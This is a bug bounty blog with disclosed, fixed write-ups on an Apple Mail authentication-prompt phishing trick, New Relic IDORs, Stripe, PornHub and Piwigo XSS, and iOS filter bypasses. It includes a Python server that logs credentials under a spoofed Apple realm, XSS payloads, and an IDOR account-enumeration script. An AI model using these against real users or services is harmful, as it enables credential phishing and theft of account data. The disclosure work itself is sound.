Security and Bug Hunting

Just another security blog - by Jon Bottarini

Don’t Reply: A Clever Phishing Method In Apple’s Mail App

About four or five years ago, friend and fellow bug bounty hunter Sam Curry asked if I had “ever thought about what was possible to load inside an <img> tag, besides an image”. What a peculiar question. I didn’t really understand what he was asking, and I assume Sam got bored of me guessing the wrong answers, so he sent a simple payload that looked like this:

<img src=></img>

On the surface, this appears to be a normal HTML <img> element, until you look a bit closer and realize that the src attribute is not pointing to an image at all, but rather to a webpage ending in .php. If you navigate to this page directly, you’ll be prompted with something that looks like this:

What you’re looking at is an implementation of WWW-Authenticate. In 2017, if you were to embed this <img> payload in an HTML editor on a third-party website, nearly anyone who viewed the page with the rendered <img> tag would see an authentication prompt asking them to sign in to my site. It looked like this:

A prompt asking users on an Airbnb community website to log in to my website
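For those curious, serving such a prompt takes nothing more than a web server that answers every request with a 401 and a WWW-Authenticate header. A minimal sketch in Python (my original page was PHP; this is a hypothetical stand-in):

```python
import http.server

class CredentialPhishHandler(http.server.BaseHTTPRequestHandler):
    """Answer every GET with a 401 Basic-auth challenge.

    Whatever the victim types into the prompt comes back base64-encoded
    in the Authorization header of the follow-up request.
    """

    def do_GET(self):
        auth = self.headers.get("Authorization")
        if auth:
            # the victim submitted the prompt: log the captured credentials
            print("captured:", auth)
        self.send_response(401)
        self.send_header(
            "WWW-Authenticate",
            'Basic realm="You need to enter your Apple Mail password again!"')
        self.end_headers()

    def log_message(self, *args):
        pass  # silence the default per-request logging

def run(port=8080):
    # point the <img src=...> payload at this host and port
    http.server.HTTPServer(("", port), CredentialPhishHandler).serve_forever()
```

Any page that renders the <img> tag pointing at this server triggers the browser’s native login dialog.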

Simply incredible. I don’t think Sam realized at the time what he was sitting on in the world of bug bounty – this was essentially a lazy way to phish users on forums, help centers, and anywhere else you could enter an image tag. It was unique because in situations where you were allowed to insert an <img> tag but not able to pop an XSS payload (due to CSP or other protections in place), applications rarely prevented you from loading an external “image” that was really my malicious WWW-Authenticate page. Remember: this was 2017, and a lot has changed since then.

After sharing this revelation with Sam, we reported instances of sites vulnerable to this issue to a few bug bounty programs, and it was largely hit or miss. Some programs (Yahoo!, if I remember correctly, back before they rebranded their program to Oath, and then to Verizon Media¹) paid $1,000 for each instance of the issue; other programs didn’t pay anything at all, stating that it was a browser issue. This is understandable – in a way, this issue could be fixed by the browser. The Chrome team decided to fix this outright back in 2013 by preventing cross-origin authentication prompts for image resources. Sam petitioned Mozilla to do the same in 2017, which they (begrudgingly) did, shipping the change to disallow external WWW-Authenticate prompts loaded via images somewhere around Firefox version 57. Apple never responded when we reached out to inform them that Safari was the last major browser to suffer from this.

The Problem in Apple Mail

I got bored with the 50/50 odds of getting a bounty through the web programs we were reporting to. A few months passed and I had an epiphany – in the form of a spam email. In short, an email evaded my spam filter because it had no content besides a photo. Just a big, massive JPG image. This led to an idea: what if I sent a “photo” that was behind a WWW-Authenticate response header in an email? What type of prompt would the recipient see? Would they see anything at all?

It doesn’t work. Simply put, I am not sure why the prompt doesn’t appear when the recipient first opens the email – but it does appear when replying to it. When you reply to an email containing the <img> payload I mentioned above, the user is presented with this prompt, which asks them to enter their name and password “to view this page”:

This prompt poses a two-fold problem. The first is that users are already accustomed to entering their username and password into ambiguous and confusing prompts on Apple devices – Apple Keychain being a major offender.

But this is not a keychain prompt – when a user enters their username and password in this prompt, their credentials are sent directly to my server.

The second problem is that it’s possible to customize the message displayed underneath the URL – in the example above, I put “You need to enter your Apple Mail password again!”. This is made possible through the realm directive:


A string describing a protected area. A realm allows a server to partition up the areas it protects (if supported by a scheme that allows such partitioning), and informs users about which particular username/password are required. If no realm is specified, clients often display a formatted hostname instead.

Mozilla developer portal
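Concretely, the phishing page needs nothing more than a response like this (a hypothetical reconstruction; the exact headers of my page aren’t shown above):

```http
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="You need to enter your Apple Mail password again!"
Content-Length: 0
```

The realm string is rendered verbatim in the prompt, which is what makes the message so customizable.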

All in all, you get a very clever Apple Mail phishing method. Now, a savvy person would realize that the domain shown in the prompt has nothing to do with Apple, and would probably be skeptical of entering a username and password – but official-sounding Apple domain names are cheap!

This issue affected versions of Apple Mail from macOS High Sierra 10.13 to macOS Big Sur 11.2. Yes, you read that right – it took multiple operating systems and four years to fix this issue completely. But before you get out the pitchforks, it’s not entirely Apple’s fault it took so long: there was a two-year period where both Apple and I thought the issue was fixed, when it really wasn’t.


  • Sometime mid to late 2017 (email comms are a bit messy here) – reported issue to Apple
  • Oct 2017 – Apple can’t reproduce the issue, I reply with additional info
  • Nov 2017 – More back and forth, explaining to Apple that the issue only occurs when replying/forwarding the email
  • Sometime in 2018 – Apple states this issue is not eligible for a CVE 🙁
  • July 2018 – Apple states they fixed the issue in macOS High Sierra 10.13 and macOS High Sierra 10.13.2
  • May 2020 – I start to write this blog post, but when I test the old proof of concepts, I notice that the payload is not fully fixed on macOS Catalina 10.15.4 and I am still getting the prompt. Replied back to Apple with proof that the issue still exists.
  • October 2020 – Apple states they have fixed the issue again – I find a bypass pretty quickly (by sending an email with an embedded image loaded inside a pre-made feature in Apple Mail called “email templates”). Apple continues work on the remediation.
  • April 2021 – I follow up asking for a status update. Apple states the issue has been resolved in macOS Big Sur 11.2
  • August 2021 – Apple sends me an email out of the blue stating that the issue is eligible for a $5,000 bounty (w0w!)
  • December 2021 – Bounty paid + this writeup is disclosed.

¹ – At time of writing, Verizon Media has rebranded back to Yahoo. We have come full circle.

Very special thanks to Sam Curry (@samwcyo) and Tanner (@itscachemoney) for reviewing a draft of this post.

Follow me on Twitter to stay up to date with my latest bugs + bug bounty finds.

Using Burp Suite match and replace settings to escalate your user privileges and find hidden features

On May 14th, Lew Cirne, the CEO of New Relic, announced a new platform called New Relic One. The platform, featuring a fresh new design and better data visualizations, came as a surprise to investors and New Relic users alike.

But it did not come as a surprise to me, for I had found out about it months prior, using a common trick that I’ve used multiple times in other bug bounty programs to access unreleased beta and admin features: the Burp Suite match and replace rule.

The concept is simple: by changing the server response body from “false” to “true” (I cheekily refer to this as the FALSE2TRUE trick, because everything has to have a catchy name nowadays 😏), you can expose client-side functionality that was previously hidden or inaccessible – and that’s exactly what happened when I found out about New Relic One. This is not a secret; it has been a known method for a long time.

For those of you new to using the Burp Suite match and replace rule, this article goes deeper into where to find it in Burp and how to use it – but it lives under the Proxy settings in Options:

The match and replace rule goes well beyond just changing false responses to true – it can also be used for privilege escalation, changing your user permissions from “User” to “Admin”. Let’s use the following example:

Imagine the server performs a check of the permissions of the user with the current session. The request to the server might look something like this:

POST /api/getUserDetails HTTP/1.1
Cookie: mycookies


And the response might look like this:

HTTP/1.1 200 OK

{"userLevel":"READONLY","subscriptionLevel":"BASIC"}


In the response, the client operates under the assumption that the user is in “READONLY” mode and has a “BASIC” subscription. If we add a match and replace rule to change the “userLevel”:READONLY response to “userLevel”:ADMIN, we can trick the client into displaying UI elements that are meant only for Administrators:

We can go one step further and display UI elements that are meant only for a “Professional” level subscription as well:

If we were to add the match/replace rules above, the response to the client will now look like this:

HTTP/1.1 200 OK

{"userLevel":"ADMIN","subscriptionLevel":"PROFESSIONAL"}


@daeken has another nifty trick with the Burp match/replace rule: injecting payloads into forms instead of typing out the entire payload:

Back to New Relic. I was using the FALSE2TRUE trick when I realized that there was a feature flag on my account which always returned false. By simply changing this response to true using a Burp match/replace rule, I noticed that additional UI elements appeared on the page.

This is the New Relic landing page when logging in without FALSE2TRUE:

Now, when using the FALSE2TRUE trick, changing all “false” values to “true”:

Bug found!

The Burp match and replace rule gave me access to a completely unreleased feature with a ton of new functionality, where I found other bugs as well, prior to the public release.

A word of warning: be careful when using the FALSE2TRUE trick on big websites, because you can really mess up your session, or even your entire account.

I’m curious how you use the match/replace tool in your Burp projects – leave a comment below or ping me on Twitter if you would like to share. If it’s a really good tip, I’ll put it in this post so others can learn!

Until next time 👋

(The New Relic security team reviewed this post in full before it was published and agreed to let me use one of my reports as an example. I am especially grateful to the New Relic team for being so open and accepting of my using their program and the bugs I’ve found as examples on my blog.)

Get as image function pulls any Insights/NRQL data from any New Relic account (IDOR)

This writeup walks you through the full process of how I found a pretty bad Insecure Direct Object Reference (IDOR) in New Relic.

In New Relic, there is the ability to add a 3rd party integration to a product line called New Relic Infrastructure. Common integrations include AWS, Azure, and most recently Google Cloud Platform (GCP). In Google Cloud Platform there is also the ability to create dashboards:

New Relic dashboards

Dashboards are pretty common in New Relic, but there was something unique about the dashboards within the integrations section: the dropdown options for each chart allow you to perform the following actions, which are not present in any of the other dashboard areas:

The option that immediately stood out to me was the “Get as image” option. This option converts the NRQL query that generates the dashboard into an image – and this is where the vulnerability lies. For more info on how the New Relic Query Language (NRQL) works, check out this link:

The normal POST request to generate the dashboard image is as follows:

{"query":{"account_id":1523936,"nrql":"SELECT count(*) FROM IntegrationError FACET dataSourceName SINCE 1 DAY AGO"},"account_id":1523936,"endpoint":"/v2/nrql","title":"Authentication Errors"}

The application failed to check and see if the account_id parameter belonged to the user making the request. The account number 1523936 belongs to me, but if I changed it to another number, I could pull data from another account.

So now that I had control over this value, I could change the account ID to any other account ID on New Relic. Since the account ID parameter is incremental, if I were malicious I could simply throw this request into Burp Intruder, highlight the account ID value, and increment it by one on each request, enabling me to pull any data I wanted from any or all accounts on New Relic. The NRQL query could be modified as well: instead of pulling the data that generated the original dashboard, I could change the request to something like this:

{"query":{"account_id":any_account_number_here,"nrql":"SELECT * FROM SystemSample"},"account_id":any_account_number_here,"endpoint":"/v2/nrql","title":"Uh oh!"}

This query runs the SystemSample NRQL query on any account ID, which downloads the following photo:

So this is interesting, but it doesn’t really tell me any juicy info. I know that I’m hitting other accounts, but the information I’m retrieving is useless – it just shows an empty chart! I played around with this for a little while, trying different NRQL queries, until I discovered an interesting header in the response the server sends back for this type of request:


I realized that if you add ?type= at the end of the URL, it will show you different chart types, allowing you to exfiltrate more data than normal. If you enter an incorrect “?type=” value, the error message lists all of the available chart options:

{"code":"BadRequestError","message":"uhoh is not a valid Vizco chart type. Permitted Types: apdex area bar baseline billboard bullet empty event-feed funnel heatmap histogram json line markdown pie stacked-horizontal-bar scatter table traffic-light vertical-bar"}

Now I can use any of the above chart types to return more information than I normally would from the NRQL query:


Now we’re getting somewhere! Instead of the normal chart type, I’m now returning a JSON dump of the dashboard, downloaded as a photo. This is pretty great considering I can perform this JSON dump against any account – but I want to go one step further. How can I exfiltrate as much data as possible in each request? Just add &height=2000 at the end of the URL 🙂
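Putting the enumeration idea together: request bodies like the ones above are trivial to generate programmatically. A short sketch (field names copied from the example requests; the account IDs beyond my own are hypothetical):

```python
import json

def build_nrql_payload(account_id: int,
                       nrql: str = "SELECT * FROM SystemSample",
                       title: str = "Uh oh!") -> str:
    """Build the JSON body for the 'Get as image' request, with the
    attacker-controlled account_id substituted in both places it appears."""
    return json.dumps({
        "query": {"account_id": account_id, "nrql": nrql},
        "account_id": account_id,
        "endpoint": "/v2/nrql",
        "title": title,
    })

# since account IDs are sequential, a malicious client could simply
# walk the ID space, one request body per account
payloads = [build_nrql_payload(i) for i in range(1523936, 1523939)]
```

This is essentially what Burp Intruder does with a single numeric payload position.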


I reported this to the New Relic team and they fixed it within a few days. I was awarded $2,500 for this bug. I asked them if they wanted to include a comment on this post about how they fixed the issue, and they provided the following:

For some background, this report helped us identify a logic error with the validation code we have in place in our backend authentication proxy. A very specific combination of configuration options for an application would result in the validation checks not taking place.

Once we identified that issue, we were able to search for anywhere we were using that combination of configuration options to quickly mitigate the issue. That then led to a permanent fix of the logic issue, ensuring that the account validation always took place before the request was allowed to proceed.

The New Relic security team is one of the best ones out there – they award quickly and their time to resolution is fantastic. It’s really one of the main reasons I enjoy hunting for bugs on them so much!

Follow me on Twitter to stay up to date with what I’m working on and security/bug bounties in general 🙂

Abusing internal API to achieve IDOR in New Relic

I recently found a nice insecure direct object reference (IDOR) in New Relic which allowed me to pull data from other user accounts. I thought it was worth writing up because it might make you think twice about the types (and the sheer number!) of APIs that are used in popular web services.

New Relic has a private bug bounty program (I was given permission to talk about it here), and I’ve been on it for quite some time, so I’ve become very familiar with the overall setup and functionality of the application – but this bug still took me a long time to find, and you’ll see why below.

Some background first: New Relic has a public REST API which can be used by anyone with a standard user account. This API operates by passing the X-Api-Key header along with your query. Here’s an example of a typical API call:

curl -X GET '{application_id}/hosts.json' \
     -H 'X-Api-Key:{api_key}' -i

Pretty typical. I tried to poke at this a little by swapping the {application_id} with the {application_id} of another account that belongs to me. I usually test for IDORs this way: one browser (usually Chrome) set up as my “victim” account and another browser (usually Firefox) as the “attacker” account, with everything routed through Burp so I can check the responses after I change values here and there. It’s kind of an old-school way to test for IDORs and permission-structure issues, and there is probably a much more effective way to automate something like this, but it works for me. Needless to say, this was a dead end, and it didn’t return anything fruitful.

I looked further and found that New Relic also implements an internal API, which appears in both their Infrastructure product and their Alerts product. They conveniently identify this through the /internal_api/ endpoint (and put references to their internal API in some of their .js files as well).

The two products operate on different subdomains. This is what it looks like in Burp, on the domain where the IDOR originally occurred.

The reason I bring up the fact that there are two separate subdomains is that this bug sat there for an excessive amount of time because I didn’t bother checking both subdomains and their respective internal APIs. To make it even more difficult, there are multiple versions of the internal_api, and the bug only worked on version 1. Here’s what the vulnerable endpoint looked like:

{ACCOUNT NUMBER}/incidents

The account number increases by one every time a new account is created, so I could have enumerated every single account pretty easily by running an Intruder attack and increasing the value by one each time. The IDOR was possible because the application did not ensure that the account number requested through the internal API GET request above matched the account number of the authenticated user.
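The fix boils down to an ownership check the endpoint was missing. A hypothetical sketch of the check the server should have been making before serving the request (names invented for illustration; New Relic’s backend is not Python):

```python
class AccountMismatchError(Exception):
    """Raised when a session tries to read another account's data."""

def authorize_account_access(session_account_id: int,
                             requested_account_id: int) -> None:
    """The missing check: the account number in the URL must belong to
    the authenticated session, otherwise the request is rejected."""
    if session_account_id != requested_account_id:
        raise AccountMismatchError(
            "account %d may not read account %d"
            % (session_account_id, requested_account_id))
```

Without this comparison, any authenticated user can walk the sequential account-ID space and read everyone else’s data.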

This IDOR allowed me to view the following from any New Relic account:

  • Account Events
  • Account Messages
  • Violations (Through NR Alerts)
  • Policy Summaries
  • Infrastructure events and filters
  • Account Settings

This bug has been resolved and I was rewarded $1,000. I’d just like to point out that the New Relic engineering and development team was super quick to remediate this. Special thanks to the New Relic team for running one of, if not the best bug bounty programs out there!

Follow me on Twitter to stay up to date with what I’m working on and security/bug bounties in general 🙂


Inspect Element leads to Stripe Account Lockout Authentication Bypass

A common thing I see happening with many popular applications is that a developer will disable an HTML element through the “class” attribute. It usually looks something like this:

<a href="#" name="disabled_button" class="button small grey disabled">

This works pretty well in some situations, but in other situations it can be manipulated to perform actions that really shouldn’t be done by an unauthenticated user. That’s exactly what happened in a bug I submitted to Stripe a few weeks ago.

When you are logged into your Stripe account, you will be timed out after a certain amount of inactivity. Once you reach this timeout, you aren’t able to make any changes on the account or view other pages until you re-authenticate by entering your password. Herein lies the problem with using a “disabled” class: an attacker can simply manipulate the page through Inspect Element, delete the disabled class, and view other pages, allowing them to send requests.

In this video below, you’ll see how I’m locked out of a Stripe account because of inactivity, but by navigating to the “invite user” section of the timeout page through inspect element, I am able to invite myself as an administrator on the account that is timed out, without authenticating first.

This, of course, requires a person to first be logged in to their Stripe account and leave their computer out in the open… but using this method you can render the entire lockout process completely useless on an account. It’s interesting nonetheless that the folks at Stripe made sure a malicious user couldn’t change the webhooks… but inviting an administrator to the account was completely allowed.

Stripe followed up and clarified that simply dismissing the entire modal isn’t enough to bypass the authentication check; the check actually happens on the backend, but it was accidentally removed in this situation, which is what allowed me to invite another administrator.

Stripe security was very responsive in resolving this issue and it was fixed shortly after I reported it. I asked permission before publishing this article. Bounty: $500.

I have some more bounty writeups that are a bit more technical than this one coming soon, including a writeup on a CVE I discovered, so check back later for more updates. Additionally, you can follow me on Twitter to stay up to date with my bugs and what I’m doing, if you wish.

Penetrating PornHub – XSS vulns galore (plus a cool shirt!)

When PornHub launched their public bug bounty program, I was pretty sure that most of the low-hanging fruit would already have been found and reported. Yet when I first started poking around, I found my first vulnerability in less than 15 minutes. The second vulnerability was found a few minutes afterward. I have never in my entire bug-hunting career found bugs this quickly, so it was pretty exciting.

In return, I received two payments of $250 and a really really cool T-Shirt + stickers that I posted on Reddit here:

When I posted this on Reddit I had no idea it would be so popular and raise so many questions. Most people asked “What was the hack?” followed by “Why would you hack PornHub?” and I couldn’t talk about it until…now. (These vulnerabilities have now been fixed.)

I found and reported two reflected cross-site scripting (XSS) vulnerabilities within 20 minutes of browsing the PornHub Premium website. Cross-site scripting, if you’re not familiar with it, is a type of vulnerability that enables an attacker to run dangerous scripts on a website. OWASP sums it up pretty nicely here:

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

The first one was found using the “redeem code” section of the site – it didn’t check whether the code being entered in the text input was actually a payload, so I was able to use the following payload to reflect the script on the page:

PAYLOAD+STACK++%3E%27" /Autof<K>ocus /O<K>nfocus=confirm`1`//&error=1

The first part of the payload “PAYLOAD STACK” ensures that the rest of the payload is sent through. If I entered:

++%3E%27" /Autof<K>ocus /O<K>nfocus=confirm`1`//&error=1

Without the words in front of it, the application would reject it and nothing would appear on the page. Entering something non-malicious at the start would trick the validator and, in turn, allow the payload to execute.

The second vulnerability was also an XSS. This one was a bit simpler, and was found by entering a payload in a URL parameter that only appears once, to new users… which is why I think it hadn’t been found until now. Most bug hunters like to get a feel for a website before they start poking around and trying to get things to break, but I usually take a different approach and use incognito windows so that the website thinks it’s the first time I’ve ever visited the site. This is where the vulnerability existed.

I noticed that the PornHub Premium site was mostly off-limits unless you paid to access it. Before you could even pay, a “pop-up” window displays to the user that they are going to be viewing pornography, with a button to either enter or exit. What I also noticed is that once you selected “enter”, part of the URL changed and a parameter was added. This vulnerable parameter was &compliancePop=no_gateway – this is where I was able to enter:


And I got a really nice “1” to appear on the screen, which shows evidence of cross-site scripting. I reported both of these vulnerabilities to PornHub and they were triaged within 24 hours.

I’d like to thank the folks at PornHub for running such a fair, quick-responding program and keeping their users safe. Also – thanks for the amazing T-shirt! Thanks also to the folks at Reddit for being so interested in this that I had to send over 200 PMs to people who wanted to know what I did… hopefully this lives up to the promise that I would tell you about it, and sorry it took so long.

I have other bugs and vulnerabilities that are cooler and more intense than this one coming soon, so check back later and I’ll share them with you. Additionally, you can follow me on Twitter to stay up to date with my bugs and what I’m doing, if you wish.

Discovering a stored XSS that affects over 900k websites (CVE-2016-9751)

In my free time when I’m not hunting for bugs in paid programs, I like to contribute a bit to the open-source community and check for vulnerabilities that might arise. In doing so, I found a stored cross-site scripting vulnerability that affected over 900,000 websites… yikes.

The vulnerable application is called Piwigo – an open-source image showcase/album that, according to Google, is active on over 900,000 webpages. The true number is probably higher than that, but that’s just what the original search brings up. It’s commonly a one-click install on many web hosting platforms for image showcases. Anyhow – on to the bug:

Piwigo has an option that allows for a “quick search” of the photo gallery. (Important to note: there are different “themes” a visitor can choose that change the way the pictures are displayed and the way the page looks – this will be important to remember later.)

When you enter a payload, the page displays the payload (sanitized properly) – and then saves the search as a number inside the URL. For example, my search URL is:

That number at the end can be changed, so you can see what other keywords people have searched on the site. I’m not sure if this is a good or a bad idea, but that’s not the bug.

The bug is that when you enter a payload in this quick search area and have also selected the “elegant” theme, there is the option to open a “search criteria” page.

It just so happens that on this search rules page… the keywords (or payload) you entered earlier are not sanitized. You end up getting this beautiful pop-up that all of us bug-hunters love to see:

Sidenote: If you’re a bug bounty hunter, it’s always best to use alert(document.domain) instead of alert(1) – it tells you if the payload is actually firing on a domain that is in scope for the program.

Now here is where it gets bad… that URL above is permanently stored on your website – and I think the only way to remove it is if you manually purge the search history from the administrator backend. Below is a picture of where you can perform that purge:

Why is this bad? An attacker could stockpile payloads that will still execute even after the website implements a patch: since the search was stored in the database before the patch went into place, all the attacker needs to do is direct the victim to the old URL – and the website owner can’t do much about it if they haven’t purged the search history.

Example of what I mean: at the time of this writing, if you visit the URL in that picture, the payload will still execute, even though the vulnerability was fixed a long time ago.

I was assigned (my first ever!) CVE-2016-9751 for this vulnerability. A fix was implemented after reporting. Webmasters and gallery owners should update to Piwigo 2.9 in order to get the patch.

Payload used:

"x><img src=a onerror=alert(1)>


Bypassing Apple’s iOS 10 Restrictions Settings – Twice

By default, Apple allows all of their iOS devices to be assigned restrictions, so that children (and employees) cannot access naughty websites and other less-desirable content. You can enable these settings by visiting Settings > General > Restrictions on your iPhone or iPad.

Around the beginning of every year I try to break Apple’s restrictions settings for websites. It’s a pretty nerdy thing to do, and it’s not really classified as a “vulnerability” – but it’s a fun challenge and leads to some pretty interesting bugs, so I wanted to talk about a few of them here:

When I test the restriction settings, I turn restrictions on, and then I change the website settings to allow Safari, but only for the default list of specific websites (see screenshot below).

The first time I found out how to bypass the restrictions, I did it by accident. I noticed that there were certain pages I had open previously in Safari that, when restrictions were turned on, I was still able to reload, even though the domains were not on the list of approved websites. I realized that all of these pages had one thing in common: they were all displaying PDFs. So, by simply appending .pdf to the end of the Safari URL, it was possible to visit any website. An example is below:

Restricted URL: (left image)

Allowed URL: (right image)

That one was pretty interesting. I reported it to Apple through their bug tracker and it was marked as a duplicate – looks like someone else had found it before me. I tried again to see if a bypass was possible through another method, and after a few hours I discovered another way:

(The following is my assumption as to how the website restrictions work behind the scenes.) When Apple checks a URL, they check the structure of the URL to see if it matches the list of whitelisted domains. What doesn’t happen is an additional check to ensure that the URL actually ends there… or whether it merely contains subdomains that match a whitelisted domain. This may be hard to explain, so I made a photo to demonstrate:

See what’s happening here? Only the URL up to “.com” is checked against the whitelist. The restrictions settings do not check whether the URL continues past that point… so I’m able to trick the filter into allowing a domain that merely begins with a whitelisted name. The actual domain name in this case is definitely not on my approved list of domains.

Restricted URL: (left image)

Allowed URL (but shouldn’t be!): (right image)

I also reported this to Apple about 7 months ago and it still isn’t fixed. I asked them for permission to share this article.

This is just an interesting bug that slipped through the cracks; I assume they will have a fix out eventually. I still haven’t made it into the Security Hall of Fame for Apple, but it’s definitely a goal of mine for the year.

I have other bugs and vulnerabilities that are cooler and more intense than this one coming soon, so check back later and I’ll share them with you. Additionally, you can follow me on Twitter to stay up to date with my bugs and what I’m doing, if you wish.